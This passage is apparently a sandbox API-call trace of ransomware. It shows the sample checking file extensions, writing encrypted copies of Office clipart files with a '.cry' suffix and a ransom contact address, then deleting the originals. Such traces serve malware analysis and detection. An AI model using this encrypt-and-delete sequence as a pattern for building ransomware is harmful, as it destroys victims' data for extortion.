Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.171] lstrlenW (lpString=".dbf") returned 4 [0053.171] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.171] lstrlenW (lpString=".1cd") returned 4 [0053.171] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.171] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04326_.WMF") returned 63 [0053.171] lstrlenW (lpString=".jpg") returned 4 [0053.171] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.172] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=4996) returned 1 [0053.172] CloseHandle (hObject=0x1c0) returned 1 [0053.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf")) returned 0x20 [0053.172] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.172] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.172] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.172] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0053.172] GetLastError () returned 0x0 [0053.172] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x1384, lpOverlapped=0x0) returned 1 [0053.263] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x1390, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x1390, lpOverlapped=0x0) returned 1 [0053.264] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.264] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.264] SetEndOfFile (hFile=0x1f0) returned 1 [0053.264] CloseHandle (hObject=0x1f0) returned 1 [0053.264] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.264] SetEndOfFile (hFile=0x1c0) returned 1 [0053.265] CloseHandle (hObject=0x1c0) returned 1 [0053.265] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.265] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\an04384_.wmf")) returned 1 [0053.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.265] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.265] lstrlenW (lpString=".doc") returned 4 [0053.265] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.265] lstrlenW (lpString=".docx") returned 5 [0053.265] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.265] lstrlenW (lpString=".pdf") returned 4 [0053.265] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.265] lstrlenW (lpString=".xls") returned 4 [0053.266] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.266] lstrlenW (lpString=".xlsx") returned 5 [0053.266] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.266] lstrlenW (lpString=".ppt") returned 4 [0053.266] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.266] lstrlenW (lpString=".zip") returned 4 [0053.266] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.266] lstrlenW (lpString=".rar") returned 4 [0053.266] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.266] lstrlenW (lpString=".bz2") returned 4 [0053.266] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.266] lstrlenW (lpString=".7z") returned 3 [0053.266] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.266] lstrlenW (lpString=".dbf") returned 4 [0053.266] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.266] lstrlenW (lpString=".1cd") returned 4 [0053.266] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.266] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\AN04384_.WMF") returned 63 [0053.266] lstrlenW (lpString=".jpg") returned 4 [0053.266] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.267] GetFileSizeEx (in: hFile=0x1c0, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=26886) returned 1 [0053.267] CloseHandle (hObject=0x1c0) returned 1 [0053.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf")) returned 0x20 [0053.267] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c0 [0053.267] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.267] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.267] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f0 [0053.268] GetLastError () returned 0x0 [0053.268] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x6906, lpOverlapped=0x0) returned 1 [0053.324] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x6910, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x6910, lpOverlapped=0x0) returned 1 [0053.326] ReadFile (in: hFile=0x1c0, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.326] WriteFile (in: hFile=0x1f0, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.326] SetEndOfFile (hFile=0x1f0) returned 1 [0053.327] CloseHandle (hObject=0x1f0) returned 1 [0053.327] SetFilePointerEx (in: hFile=0x1c0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.327] SetEndOfFile (hFile=0x1c0) returned 1 [0053.327] CloseHandle (hObject=0x1c0) returned 1 [0053.328] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.328] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd00141_.wmf")) returned 1 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.418] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.418] lstrlenW (lpString=".doc") returned 4 [0053.418] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString=".docx") returned 5 [0053.418] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.418] lstrlenW (lpString=".pdf") returned 4 [0053.418] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.418] lstrlenW (lpString=".xls") returned 4 [0053.419] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.419] lstrlenW (lpString=".xlsx") returned 5 [0053.419] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.419] lstrlenW (lpString=".ppt") returned 4 [0053.419] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.419] lstrlenW (lpString=".zip") returned 4 [0053.419] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.419] lstrlenW (lpString=".rar") returned 4 [0053.419] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.419] lstrlenW (lpString=".bz2") returned 4 [0053.419] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.419] lstrlenW (lpString=".7z") returned 3 [0053.419] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.419] lstrlenW (lpString=".dbf") returned 4 [0053.419] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.419] lstrlenW (lpString=".1cd") returned 4 [0053.419] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.419] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD00141_.WMF") returned 63 [0053.419] lstrlenW (lpString=".jpg") returned 4 [0053.419] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.419] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.419] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.419] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0053.420] GetLastError () returned 0x0 [0053.420] ReadFile (in: hFile=0x190, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x4354, lpOverlapped=0x0) returned 1 [0053.445] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x4360, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x4360, lpOverlapped=0x0) returned 1 [0053.446] ReadFile (in: hFile=0x190, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.446] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.447] SetEndOfFile (hFile=0x184) returned 1 [0053.447] CloseHandle (hObject=0x184) returned 1 [0053.447] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.447] SetEndOfFile (hFile=0x190) returned 1 [0053.448] CloseHandle (hObject=0x190) returned 1 [0053.448] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0053.448] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd05119_.wmf")) returned 1 [0053.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.448] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.448] lstrlenW (lpString=".doc") returned 4 [0053.448] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0053.448] lstrlenW (lpString=".docx") returned 5 [0053.448] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0053.448] lstrlenW (lpString=".pdf") returned 4 [0053.448] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0053.448] lstrlenW (lpString=".xls") returned 4 [0053.449] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0053.449] lstrlenW (lpString=".xlsx") returned 5 [0053.449] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0053.449] lstrlenW (lpString=".ppt") returned 4 [0053.449] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0053.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.449] lstrlenW (lpString=".zip") returned 4 [0053.449] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0053.449] lstrlenW (lpString=".rar") returned 4 [0053.449] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0053.449] lstrlenW (lpString=".bz2") returned 4 [0053.449] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0053.449] lstrlenW (lpString=".7z") returned 3 [0053.449] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0053.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.449] lstrlenW (lpString=".dbf") returned 4 [0053.449] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0053.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.449] lstrlenW (lpString=".1cd") returned 4 [0053.449] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0053.449] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD05119_.WMF") returned 63 [0053.449] lstrlenW (lpString=".jpg") returned 4 [0053.449] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0053.449] GetFileSizeEx (in: hFile=0x190, lpFileSize=0x2c5ff1c | out: lpFileSize=0x2c5ff1c*=26748) returned 1 [0053.449] CloseHandle (hObject=0x190) returned 1 [0053.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 0x20 [0053.450] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0053.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x190 [0053.450] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.450] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.450] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0053.450] GetLastError () returned 0x0 [0053.450] ReadFile (in: hFile=0x190, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x687c, lpOverlapped=0x0) returned 1 [0053.633] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x6880, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x6880, lpOverlapped=0x0) returned 1 [0053.634] ReadFile (in: hFile=0x190, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.634] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0053.634] SetEndOfFile (hFile=0x184) returned 1 [0054.117] CloseHandle (hObject=0x184) returned 1 [0054.117] SetFilePointerEx (in: hFile=0x190, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.117] SetEndOfFile (hFile=0x190) returned 1 [0054.118] CloseHandle (hObject=0x190) returned 1 [0054.118] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0054.118] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd07761_.wmf")) returned 1 [0054.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0054.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0054.214] lstrlenW (lpString=".doc") returned 4 [0054.214] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0054.214] lstrlenW (lpString=".docx") returned 5 [0054.214] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0054.214] lstrlenW (lpString=".pdf") returned 4 [0054.214] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0054.214] lstrlenW (lpString=".xls") returned 4 [0054.214] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0054.214] lstrlenW (lpString=".xlsx") returned 5 [0054.214] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0054.214] lstrlenW (lpString=".ppt") returned 4 [0054.214] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0054.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0054.214] lstrlenW (lpString=".zip") returned 4 [0054.214] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0054.214] lstrlenW (lpString=".rar") returned 4 [0054.214] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0054.214] lstrlenW (lpString=".bz2") returned 4 [0054.214] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0054.214] lstrlenW (lpString=".7z") returned 3 [0054.214] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0054.214] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0054.214] lstrlenW (lpString=".dbf") returned 4 [0054.215] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0054.215] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0054.236] lstrlenW (lpString=".1cd") returned 4 [0054.236] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0054.236] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD07761_.WMF") returned 63 [0054.236] lstrlenW (lpString=".jpg") returned 4 [0054.236] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0054.735] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.735] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0054.735] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0054.735] GetLastError () returned 0x0 [0054.735] ReadFile (in: hFile=0x21c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x60ca, lpOverlapped=0x0) returned 1 [0054.954] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0x60d0, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0x60d0, lpOverlapped=0x0) returned 1 [0055.130] ReadFile (in: hFile=0x21c, lpBuffer=0x3740020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c5fed4, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesRead=0x2c5fed4*=0x0, lpOverlapped=0x0) returned 1 [0055.130] WriteFile (in: hFile=0x184, lpBuffer=0x3740020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c5fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3740020*, lpNumberOfBytesWritten=0x2c5fc9c*=0xec, lpOverlapped=0x0) returned 1 [0055.130] SetEndOfFile (hFile=0x184) returned 1 [0055.252] CloseHandle (hObject=0x184) returned 1 [0055.252] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c5fec8 | out: lpNewFilePointer=0x0) returned 1 [0055.252] SetEndOfFile (hFile=0x21c) returned 1 [0055.253] CloseHandle (hObject=0x21c) returned 1 [0055.253] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF.id-9C354B42.[decryptoperator@qq.com].cry", dwFileAttributes=0x20) returned 1 [0055.253] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bd08773_.wmf")) returned 1 [0055.271] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0055.272] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BD08773_.WMF") returned 63 [0055.272] lstrlenW (lpString=".doc") returned 4 [0055.272] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0055.272] lstrlenW (lpString=".docx") returned 5 [0055.272] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0055.272] lstrlenW (lpString=".pdf") returned 4 [0055.272] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0055.272] lstrlenW (lpString=".xls") returned 4 [0055.272] lstrcmpiW (lpString1=".xls", 